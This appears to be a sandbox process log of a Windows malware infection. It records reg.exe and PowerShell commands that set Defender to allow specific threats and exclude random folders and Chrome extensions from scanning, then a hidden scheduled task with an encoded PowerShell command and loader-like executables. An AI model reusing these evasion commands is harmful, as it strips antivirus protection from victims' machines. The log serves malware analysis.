C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:7104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3468
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:5520
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:323⤵PID:3892
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:324⤵PID:5744
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:643⤵PID:4120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:323⤵PID:1224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:643⤵PID:5188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:323⤵PID:3328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:643⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:323⤵PID:1140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:643⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:323⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:643⤵PID:1020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:323⤵PID:6644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:643⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:6572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:323⤵PID:3100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:643⤵PID:4140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:323⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:643⤵PID:5324
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDMTnxjMT" /SC once /ST 01:58:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDMTnxjMT"2⤵PID:4964
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:1456
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵PID:2988
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:4300
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --run-assistant --allusers=01⤵PID:5192
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exeC:\Users\Admin\AppData\Local\Programs\Opera\assistant\assistant_installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x238,0x23c,0x240,0x214,0x11c,0x516038,0x516044,0x5160502⤵PID:7012
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe"C:\Users\Admin\AppData\Local\Programs\Opera\assistant\browser_assistant.exe"2⤵PID:4996
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --stream3⤵PID:3788
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x28c,0x290,0x294,0x288,0x298,0x7ffc01160650,0x7ffc01160660,0x7ffc011606704⤵PID:6756
-
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized --lowered-browser1⤵PID:5748
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x288,0x28c,0x290,0x284,0x294,0x7ffc01160650,0x7ffc01160660,0x7ffc011606702⤵PID:1936
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1860,i,11554719202757047703,5495185441207328321,262144 --variations-seed-version --mojo-platform-channel-handle=1852 /prefetch:22⤵PID:6884
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=1732,i,11554719202757047703,5495185441207328321,262144 --variations-seed-version --mojo-platform-channel-handle=1992 /prefetch:32⤵PID:5252
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2112,i,11554719202757047703,5495185441207328321,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:82⤵PID:400
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2664,i,11554719202757047703,5495185441207328321,262144 --variations-seed-version --mojo-platform-channel-handle=2680 /prefetch:82⤵PID:7068
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2668,i,11554719202757047703,5495185441207328321,262144 --variations-seed-version --mojo-platform-channel-handle=2732 /prefetch:82⤵PID:5888
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2684,i,11554719202757047703,5495185441207328321,262144 --variations-seed-version --mojo-platform-channel-handle=3128 /prefetch:82⤵PID:7104
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2704,i,11554719202757047703,5495185441207328321,262144 --variations-seed-version --mojo-platform-channel-handle=3356 /prefetch:82⤵PID:4652
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2712,i,11554719202757047703,5495185441207328321,262144 --variations-seed-version --mojo-platform-channel-handle=3480 /prefetch:82⤵PID:6652
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=renderer --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=2968,i,11554719202757047703,5495185441207328321,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:12⤵PID:4900
-
-
